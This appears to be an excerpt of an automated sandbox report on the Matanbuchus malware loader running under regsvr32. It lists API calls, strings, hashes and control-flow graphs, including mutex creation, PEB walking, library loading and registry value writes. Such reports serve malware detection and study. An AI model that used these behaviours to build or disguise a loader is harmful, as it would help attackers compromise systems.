                                                                  • Instruction ID: dea497b25eeb10d8871af17376ffe3df6b77c0d39f17f66209e600e20cc20531
                                                                  • Opcode Fuzzy Hash: 7036cdf08c8b706ad2661fba7c6a7d2830e8fd1f72de56d7a972716446e3ff27
                                                                  • Instruction Fuzzy Hash: 5C41A4B4D00609DFCB14DF98D990AEEBBB5FF48310F208259E925A7390DB346A45CFA1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 7F83FDAB
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F83FDB6
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F83FE24
                                                                    • Part of subcall function 7F83FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F83FF1F
                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 7F83FDD1
                                                                  • _Yarn.LIBCPMT ref: 7F83FDE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                  • String ID:
                                                                  • API String ID: 1088826258-0
                                                                  • Opcode ID: 6ff0a107af841b76be5b4edcd0ccc3a8e1f60e4dd5f0a15faaa8dc88a10d1352
                                                                  • Instruction ID: 282c2b29f95570b60468114f4119388119d75df1cc52ef4dcaf16dfe266b86bb
                                                                  • Opcode Fuzzy Hash: 6ff0a107af841b76be5b4edcd0ccc3a8e1f60e4dd5f0a15faaa8dc88a10d1352
                                                                  • Instruction Fuzzy Hash: 5E019E7AA00611ABCB0ADF25C48067D7BA6FF84220B689049DC225F390DF346E06CBC0
                                                                  APIs
                                                                  • LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7F814841
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: MNo name attribute $advapi32$Operation
                                                                  • API String ID: 1029625771-688042845
                                                                  • Opcode ID: bfada7323412b3bcf8c6f4bd84232d59359c28f5729c99e0631e9d4f7fb30327
                                                                  • Instruction ID: 66e6802f3dcf5f4d6674396e67ba88ac4ee5d3b10463251e930e4c6a6317ea32
                                                                  • Opcode Fuzzy Hash: bfada7323412b3bcf8c6f4bd84232d59359c28f5729c99e0631e9d4f7fb30327
                                                                  • Instruction Fuzzy Hash: 8E91D4799082688FDB15CFA6C8957EDBBF6FB46314F2881DED449AB240D3345A90CF60
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7F80E206), ref: 7F83F3F5
                                                                  • CloseHandle.KERNEL32(7F80E206), ref: 7F83F49F
                                                                  • CloseHandle.KERNEL32(?), ref: 7F83F4A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID: ?
                                                                  • API String ID: 2922976086-1684325040
                                                                  • Opcode ID: 730df17715ee9da55a086d50fcc187e05318f63fbb1a95f4f07229c68e4b6a17
                                                                  • Instruction ID: f9208ccf935cda552cda09885f6564276d5ce1edb0882d55c476741f224fb70a
                                                                  • Opcode Fuzzy Hash: 730df17715ee9da55a086d50fcc187e05318f63fbb1a95f4f07229c68e4b6a17
                                                                  • Instruction Fuzzy Hash: 2C21A271D00259BBDF298B95CC05EEF7B7EEFC4710F804069F925A9060D7319A14CAE0
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F844F43,00000000,00000001,7FB455E4,?,?,?,7F8450E6,00000004,InitializeCriticalSectionEx,7F86AE34,InitializeCriticalSectionEx), ref: 7F844F9F
                                                                  • GetLastError.KERNEL32(?,7F844F43,00000000,00000001,7FB455E4,?,?,?,7F8450E6,00000004,InitializeCriticalSectionEx,7F86AE34,InitializeCriticalSectionEx,00000000,?,7F844E9D), ref: 7F844FA9
                                                                  • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F843D43), ref: 7F844FD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3177248105-2084034818
                                                                  • Opcode ID: 92ff07e7ed8abb67fa47fa367c0360630d4ef4f6fc78a203af71c7592317444b
                                                                  • Instruction ID: 44efa66a57db76f0961eeb11070f7b7e90eb855646754781ea7b2d07c353c416
                                                                  • Opcode Fuzzy Hash: 92ff07e7ed8abb67fa47fa367c0360630d4ef4f6fc78a203af71c7592317444b
                                                                  • Instruction Fuzzy Hash: C3E01275654308B7DB111FA1DC06B5D3A66AB10761F285020FD0EAC4D1DF62E5209AD5
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F83F717,?,?,?,7F83EF6C,?,0000000F,?,00000000,00000208), ref: 7F83F946
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7F83F94D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlRandomEx$ntdll.dll
                                                                  • API String ID: 1646373207-4284430886
                                                                  • Opcode ID: 77c5887a8da1843945afb54200df67dcd60326777e723bc1f02d7ac54217611a
                                                                  • Instruction ID: 717b1f9bc49ffd5a69d381d5a35e2ed32893413a1db3a69fc9d3b2bdb8b49494
                                                                  • Opcode Fuzzy Hash: 77c5887a8da1843945afb54200df67dcd60326777e723bc1f02d7ac54217611a
                                                                  • Instruction Fuzzy Hash: 0ED09E3A5102446BDE215BE6CE48A293B69AB046253140450BE0DCE352DB24A5699BD1
                                                                  APIs
                                                                  • std::exception::exception.LIBCONCRTD ref: 7F815868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::exception::exception
                                                                  • String ID: parse error$parse_error
                                                                  • API String ID: 2807920213-1820534363
                                                                  • Opcode ID: 39e424e731dcd1366e3854a2fc518adaedcfc3a051a2ce76a6f6e6f275f34771
                                                                  • Instruction ID: 55864da6258dbe43b4d3f2fb82fc59d68a9d4450ea6db94ec5662ea88a727e0f
                                                                  • Opcode Fuzzy Hash: 39e424e731dcd1366e3854a2fc518adaedcfc3a051a2ce76a6f6e6f275f34771
                                                                  • Instruction Fuzzy Hash: 86A1E2B4D04259DFDB14CF98C990ADEBBB2FF49300F108299D959AB355DB306A45CF90
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F7F7AF3
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F7F7BBF
                                                                    • Part of subcall function 7F83FEA2: _Yarn.LIBCPMT ref: 7F83FEC1
                                                                    • Part of subcall function 7F83FEA2: _Yarn.LIBCPMT ref: 7F83FEE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F7E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7f7e0000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                  • String ID: bad locale name
                                                                  • API String ID: 1908188788-1405518554
                                                                  • Opcode ID: c6cd83fde935df8bb53dce58fdf34e0515acbca3c5ce4832ac0438bec0a48f1e
                                                                  • Instruction ID: 6dd39927356df88094622abc8f80b4bf4ddd59e700d9af6f07e609c1257e8c3b
                                                                  • Opcode Fuzzy Hash: c6cd83fde935df8bb53dce58fdf34e0515acbca3c5ce4832ac0438bec0a48f1e
                                                                  • Instruction Fuzzy Hash: 464106B4D05289DFDB01CF98C954BAEFBF1BF49304F148199D414AB382C77A9901CBA5

                                                                  Execution Graph

                                                                  Execution Coverage:0.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:27
                                                                  Total number of Limit Nodes:4
                                                                  execution_graph 22005 7f134392 22006 7f13439b GetPEB 22005->22006 22008 7f1343de PathIsDirectoryW 22006->22008 22012 7f1345b9 22008->22012 22013 7f1348d1 22008->22013 22009 7f1347db LoadLibraryExA 22010 7f134857 22009->22010 22010->22013 22014 7f149280 22010->22014 22012->22009 22019 7f1495f0 22014->22019 22017 7f149497 GetShellWindow 22018 7f1494a1 22017->22018 22018->22013 22020 7f149817 GetProcessHeap 22019->22020 22022 7f14988d 22020->22022 22023 7f149483 22022->22023 22024 7f1498fe GetDriveTypeA 22022->22024 22023->22017 22023->22018 22024->22023 22025 7f1277a0 22026 7f127a3f CreateMutexA 22025->22026 22028 7f1279a6 22025->22028 22027 7f127b44 GetLastError 22026->22027 22030 7f127a5a 22026->22030 22027->22030 22032 7f127b55 22027->22032 22028->22026 22029 7f127be4 CloseHandle 22029->22030 22032->22029 22033 7f15caf0 GetSystemDirectoryW 22036 7f148840 22033->22036 22035 7f15cd96 22037 7f149280 3 API calls 22036->22037 22038 7f148a4e 22037->22038 22038->22035
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
                                                                  • API String ID: 0-301690894
                                                                  • Opcode ID: 2fa7bca49be82c60dd3173697d0294bc1c0ce8f9ccfd9d14e11efd16663c3546
                                                                  • Instruction ID: f98d7882e7a31f1b94434bdc428a74a4cf04fd740a3c52350a0d7eb3c8000130
                                                                  • Opcode Fuzzy Hash: 2fa7bca49be82c60dd3173697d0294bc1c0ce8f9ccfd9d14e11efd16663c3546
                                                                  • Instruction Fuzzy Hash: 71E202B8E042A88FDB25CF69C890BEDBBB1BF49314F5481EAD449A7345D7316A91CF40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 355 7f134392-7f1343d8 GetPEB 357 7f1343de-7f13443c 355->357 358 7f13444a 357->358 359 7f13443e-7f134448 357->359 360 7f134454-7f134463 358->360 359->360 361 7f134564-7f134594 360->361 362 7f134469-7f13446f 360->362 361->357 363 7f13459a 361->363 364 7f134472-7f13448b 362->364 365 7f1345a4-7f1345b3 PathIsDirectoryW 363->365 364->361 366 7f134491-7f1344b5 364->366 367 7f134d07-7f134d19 365->367 368 7f1345b9-7f1345e2 call 7f148fa0 365->368 369 7f1344bf-7f1344df 366->369 373 7f134d1b-7f134d21 367->373 376 7f1345e4-7f1345fa 368->376 377 7f1345fc-7f134606 368->377 371 7f1344e1-7f134512 369->371 372 7f1344ef-7f134506 369->372 378 7f134514-7f13455d 371->378 379 7f13455f 371->379 372->369 380 7f134624-7f13466a 376->380 377->380 381 7f134608-7f13460e 377->381 378->365 379->364 383 7f134670-7f13467c 380->383 384 7f1347db-7f134855 LoadLibraryExA 380->384 381->380 382 7f134610-7f13461d 381->382 382->380 383->384 385 7f134682-7f1346bd 383->385 386 7f134863 384->386 387 7f134857-7f134861 384->387 385->384 389 7f1346c3-7f1346cf 385->389 388 7f13486d-7f134877 386->388 387->388 390 7f134885 388->390 391 7f134879-7f134883 388->391 389->384 392 7f1346d5-7f1346df 389->392 393 7f13488f-7f13489b 390->393 391->393 394 7f1346f0-7f1346fa 392->394 397 7f1349a3-7f1349aa 393->397 398 7f1348a1-7f1348de call 7f149280 393->398 395 7f134700-7f13471a 394->395 396 7f1347bf 394->396 399 7f134735 395->399 400 7f13471c 395->400 396->384 401 7f1349b0-7f134a33 call 7f160b50 397->401 402 7f134a6c-7f134abe 397->402 413 7f134965-7f13496c 398->413 414 7f1348e4 398->414 406 7f13473f-7f134746 399->406 404 7f134729-7f134733 400->404 405 7f13471e-7f134727 400->405 417 7f134a35-7f134a47 401->417 418 7f134a49-7f134a4c 401->418 402->367 409 7f134ac4-7f134adb 402->409 404->406 405->399 405->404 410 7f134754 406->410 411 7f134748-7f134752 406->411 415 7f134ae1-7f134b25 call 7f148c80 409->415 416 7f13475e-7f13476a 410->416 411->416 422 7f13499e 413->422 423 7f13496e-7f134975 413->423 419 7f1348e6-7f1348ea 414->419 420 7f1348ec-7f1348f2 414->420 431 7f134b33 415->431 432 7f134b27-7f134b31 415->432 426 7f1347a1-7f1347ac 416->426 427 7f13476c-7f13479f 416->427 425 7f134a54-7f134a66 417->425 418->425 419->413 419->420 428 7f134927-7f134960 420->428 429 7f1348f4-7f134925 420->429 422->402 423->422 424 7f134977-7f134998 call 7f160b50 423->424 424->422 425->402 434 7f1347b1-7f1347ba 426->434 427->434 435 7f134963 428->435 429->435 436 7f134b3d-7f134b43 431->436 432->436 434->394 435->422 439 7f134b77 436->439 440 7f134b45-7f134b69 436->440 442 7f134b81-7f134b8d 439->442 440->439 441 7f134b6b-7f134b75 440->441 441->442 443 7f134bc4-7f134bcd 442->443 444 7f134b8f-7f134b9c 442->444 447 7f134bd7-7f134bdc 443->447 448 7f134bcf-7f134bd5 443->448 445 7f134be7-7f134bee 444->445 446 7f134b9e-7f134bc2 444->446 450 7f134bf0-7f134c0d 445->450 451 7f134c0f-7f134c15 445->451 446->443 446->445 449 7f134bdf-7f134be5 447->449 448->449 454 7f134c5d-7f134c76 449->454 450->454 452 7f134c17-7f134c1e 451->452 453 7f134c2c 451->453 452->453 455 7f134c20-7f134c2a 452->455 456 7f134c36-7f134c45 453->456 454->415 457 7f134c7c-7f134cd4 call 7f160b50 454->457 455->456 458 7f134c53 456->458 459 7f134c47-7f134c51 456->459 462 7f134ce2 457->462 463 7f134cd6-7f134ce0 457->463 458->454 459->454 464 7f134cec-7f134d05 462->464 463->464 464->373
                                                                  APIs
                                                                  • PathIsDirectoryW.SHLWAPI(?), ref: 7F1345AB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectoryPath
                                                                  • String ID:
                                                                  • API String ID: 1580926078-0
                                                                  • Opcode ID: ef1579ada442de17bf4679af0045e2fe86f1ef45d106774f394804cdf2eb68c7
                                                                  • Instruction ID: ef067304511ad9b1c4f0660d3b2cfabce7ec4f73e39a725bfa94d9fa79107da8
                                                                  • Opcode Fuzzy Hash: ef1579ada442de17bf4679af0045e2fe86f1ef45d106774f394804cdf2eb68c7
                                                                  • Instruction Fuzzy Hash: 82B1D274D09269CBDB25CF58C894BADBBB2BF48310F2482EAD459A7345C3306E91CF84

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 188 7f1277a0-7f1279a0 189 7f1279a6-7f1279a9 188->189 190 7f127a3f-7f127a54 CreateMutexA 188->190 193 7f1279d2-7f1279d8 189->193 194 7f1279b0-7f1279d0 189->194 195 7f127a00-7f127a12 189->195 196 7f127a14-7f127a39 189->196 191 7f127b44-7f127b4f GetLastError 190->191 192 7f127a5a-7f127ab3 call 7f148fa0 190->192 198 7f127ce0-7f127cf3 191->198 199 7f127b55-7f127bd2 call 7f160b50 191->199 206 7f127ab5 192->206 207 7f127ac9 192->207 200 7f1279da-7f1279eb 193->200 201 7f1279ed-7f1279f5 193->201 194->190 195->190 196->190 204 7f127cf8-7f127cfc 198->204 211 7f127bd4-7f127bd8 199->211 212 7f127be9-7f127c02 199->212 205 7f1279f8-7f1279fe 200->205 201->205 205->190 209 7f127ac0-7f127ac7 206->209 210 7f127ab7-7f127abe 206->210 213 7f127ad0-7f127ae9 207->213 209->213 210->207 210->209 214 7f127c07-7f127c0b 211->214 215 7f127bda-7f127bde 211->215 218 7f127cb6-7f127cde CloseHandle 212->218 216 7f127aeb 213->216 217 7f127aff 213->217 223 7f127c16 214->223 224 7f127c0d-7f127c14 214->224 219 7f127be4 215->219 220 7f127c9f-7f127cb3 215->220 221 7f127af6-7f127afd 216->221 222 7f127aed-7f127af4 216->222 225 7f127b06-7f127b0c 217->225 218->204 219->218 220->218 221->225 222->217 222->221 226 7f127c1d-7f127c26 223->226 224->226 227 7f127b0e-7f127b3a call 7f160b50 225->227 228 7f127b3d-7f127b3f 225->228 230 7f127c31 226->230 231 7f127c28-7f127c2f 226->231 227->228 228->204 232 7f127c38-7f127c3e 230->232 231->232 234 7f127c40-7f127c47 232->234 235 7f127c49 232->235 236 7f127c50-7f127c59 234->236 235->236 237 7f127c5b-7f127c6d 236->237 238 7f127c6f-7f127c72 236->238 239 7f127c7a-7f127c9d 237->239 238->239 239->218
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F127A47
                                                                  • GetLastError.KERNEL32 ref: 7F127B44
                                                                  • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F127CBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                  • String ID: *$9mD$B$u${
                                                                  • API String ID: 4294037311-4130828584
                                                                  • Opcode ID: 111650e4cbe45bd1b7945d502d76c61af40aa550211ec9e0790e3385d66054d3
                                                                  • Instruction ID: d25ff37e1973cc5eb2f96b21bde089b4aa9d5e8c5bb75f323b50179241285d91
                                                                  • Opcode Fuzzy Hash: 111650e4cbe45bd1b7945d502d76c61af40aa550211ec9e0790e3385d66054d3
                                                                  • Instruction Fuzzy Hash: 80F16EB5D04299CFDB14CFA9C8407AEBBF1BB49324F2881AAE059B7350D3355A91CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 7f15caf0-7f15cd91 GetSystemDirectoryW call 7f148840 242 7f15cd96-7f15d10b call 7f160b50 240->242 262 7f15e791-7f15e7af 242->262 263 7f15d111-7f15d161 call 7f127e00 242->263 265 7f15e7b5-7f15e7c2 262->265 266 7f15e864-7f15e881 262->266 263->262 267 7f15e7c4-7f15e7ce 265->267 268 7f15e7d0 265->268 269 7f15e885-7f15e88c 266->269 271 7f15e7da-7f15e7e1 267->271 268->271 273 7f15e7e3-7f15e7ed 271->273 274 7f15e7ef 271->274 275 7f15e7f9-7f15e805 273->275 274->275 276 7f15e807-7f15e820 275->276 277 7f15e822-7f15e846 275->277 278 7f15e862 276->278 277->278 279 7f15e848-7f15e85c 277->279 278->269 279->278
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F15CCEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: )$2$?$m$n $e
                                                                  • API String ID: 2188284642-1749247282
                                                                  • Opcode ID: 4860dd4533c19268c87e0bb60651c922429b6ceadb7822f04d917185a3fc0ce1
                                                                  • Instruction ID: 776090bfd000fd823c43834700f86707a5bda453c878d532e6de02f0a06c398f
                                                                  • Opcode Fuzzy Hash: 4860dd4533c19268c87e0bb60651c922429b6ceadb7822f04d917185a3fc0ce1
                                                                  • Instruction Fuzzy Hash: 36F14CB5D042A8CFCB24CF66C8447ADBBB1BF49320F1880DAE059B7690D7765A94CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 280 7f149280-7f14947e call 7f1495f0 282 7f149483-7f149495 280->282 283 7f149497-7f14949d GetShellWindow 282->283 284 7f1494a1-7f1494ab 282->284 283->284 285 7f1494c0-7f1494ec call 7f160b50 284->285 286 7f1494ad-7f1494be 284->286 293 7f1494f7 285->293 294 7f1494ee-7f1494f5 285->294 287 7f14950e-7f149526 286->287 290 7f149536-7f149539 287->290 291 7f149528-7f149534 287->291 292 7f14953e-7f14956d 290->292 291->292 295 7f14956f-7f149576 292->295 296 7f149578 292->296 297 7f1494fe-7f149507 293->297 294->297 298 7f14957f-7f149585 295->298 296->298 297->287 299 7f149587-7f14958e 298->299 300 7f149590 298->300 301 7f149597-7f1495ea 299->301 300->301
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ShellWindow
                                                                  • String ID: 2$MNo name attribute $Q$\$c
                                                                  • API String ID: 2831631499-3960561890
                                                                  • Opcode ID: 8a507333449e43a3b48c4e765b11c7c277f8044f82f98fbe22f091f7c36d5094
                                                                  • Instruction ID: df826dfc02bbc348b0d12e86625d3348262d53abe0e51ff7071952a500f39755
                                                                  • Opcode Fuzzy Hash: 8a507333449e43a3b48c4e765b11c7c277f8044f82f98fbe22f091f7c36d5094
                                                                  • Instruction Fuzzy Hash: 73A16DB9D04298CFDB14CFAAC4807ADBBB1BF49320F6881AAE458B7741D3361954CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 302 7f1495f0-7f149815 303 7f149817-7f14984a 302->303 304 7f14984c-7f149853 302->304 305 7f14986f-7f14988b GetProcessHeap 303->305 304->305 306 7f149855-7f14986b 304->306 307 7f1498a0 305->307 308 7f14988d-7f149895 305->308 306->305 310 7f1498a7-7f1498ae 307->310 308->307 309 7f149897-7f14989e 308->309 309->310 311 7f1498b0-7f1498bc 310->311 312 7f1498be-7f1498c1 310->312 313 7f1498c6-7f1498d8 311->313 312->313 314 7f1498ed 313->314 315 7f1498da 313->315 318 7f1498f4-7f1498fc 314->318 316 7f1498e4-7f1498eb 315->316 317 7f1498dc-7f1498e2 315->317 316->318 317->314 317->316 319 7f14990c-7f149952 318->319 320 7f1498fe-7f149909 GetDriveTypeA 318->320 320->319
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 7F14986F
                                                                  • GetDriveTypeA.KERNEL32(7F1881EC), ref: 7F149903
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DriveHeapProcessType
                                                                  • String ID: *
                                                                  • API String ID: 2912393814-163128923
                                                                  • Opcode ID: cc83bb5f0b521331434fb96302c31d4003f9331364765661ad4d85eb32aa9b5a
                                                                  • Instruction ID: 18784acef9e90c7e5b89a931a610fa476a5de905665f0ded2cf02a465afddea6
                                                                  • Opcode Fuzzy Hash: cc83bb5f0b521331434fb96302c31d4003f9331364765661ad4d85eb32aa9b5a
                                                                  • Instruction Fuzzy Hash: 0DA13BB9D04299CFCB14CFAAC44079DBBB2BF49320F6881AAE449B7750D7321A54CF95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 706 7f126570-7f1265a7 call 7f160cc0 709 7f1265ae-7f12662b 706->709 710 7f126636-7f12663a 709->710 711 7f126672-7f1266b4 call 7f112020 710->711 712 7f12663c-7f126670 710->712 717 7f1266b6 711->717 718 7f1266bb-7f1266ce 711->718 712->710 719 7f126843-7f126847 717->719 720 7f1266d0-7f1266d7 718->720 721 7f1266d9 718->721 722 7f12685b-7f12685f 719->722 723 7f126849-7f126856 call 7f111d80 719->723 724 7f1266e0-7f1266ec 720->724 721->724 728 7f126873-7f126898 call 7f1320f0 722->728 729 7f126861-7f12686e call 7f111d80 722->729 723->722 726 7f1266ee-7f1266f9 724->726 727 7f1266fc-7f126730 call 7f112080 724->727 726->727 738 7f126732 727->738 739 7f126737-7f12673e 727->739 729->728 738->719 740 7f126745-7f12674c 739->740 741 7f126752-7f126793 call 7f15f4d7 call 7f111ed0 740->741 742 7f126835-7f12683d 740->742 748 7f126795 741->748 749 7f12679a-7f12679e 741->749 742->709 742->719 748->742 750 7f1267a0-7f1267af 749->750 751 7f1267b4-7f1267ba 749->751 750->742 752 7f1267e0-7f126807 GetProcessHeap HeapReAlloc 751->752 753 7f1267bc-7f1267da GetProcessHeap HeapAlloc 751->753 754 7f12680b-7f126830 call 7f132be0 752->754 755 7f126809 752->755 756 7f1267de 753->756 757 7f1267dc 753->757 754->740 755->742 756->754 757->742
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                                  • API String ID: 0-285284801
                                                                  • Opcode ID: 7006dfe1b9f62c188f293e76341c72690bfa17dee6eb0bb56e0ea6e083aed06f
                                                                  • Instruction ID: a27b92ca396c3e79064700bef79d87b7c42307ff9df595068529ce1f801a5bf0
                                                                  • Opcode Fuzzy Hash: 7006dfe1b9f62c188f293e76341c72690bfa17dee6eb0bb56e0ea6e083aed06f
                                                                  • Instruction Fuzzy Hash: 03B12274E04388DFEB01CFE8C894BDEBBF1AF49305F104159E949AB280D7B96A55CB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                                  • API String ID: 3839614884-178659603
                                                                  • Opcode ID: 8ca15c54a189d00ea130395d6a1312c769254cdffd8787cb7d45616fac6b78d2
                                                                  • Instruction ID: f3ca134aeba198fa72de5eea9be63298c0c08fa5459ead873f4853b2be83cc98
                                                                  • Opcode Fuzzy Hash: 8ca15c54a189d00ea130395d6a1312c769254cdffd8787cb7d45616fac6b78d2
                                                                  • Instruction Fuzzy Hash: 64E1CF78E01219DFDB14DF98C990B9DBBB2FF88304F2081AAD919AB354D7306A95CF54
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F15EF39
                                                                  • wsprintfW.USER32 ref: 7F15EF86
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F15EFA3
                                                                  • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F15EFC4
                                                                  • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F15EFE4
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7F15EFFD
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7F15F008
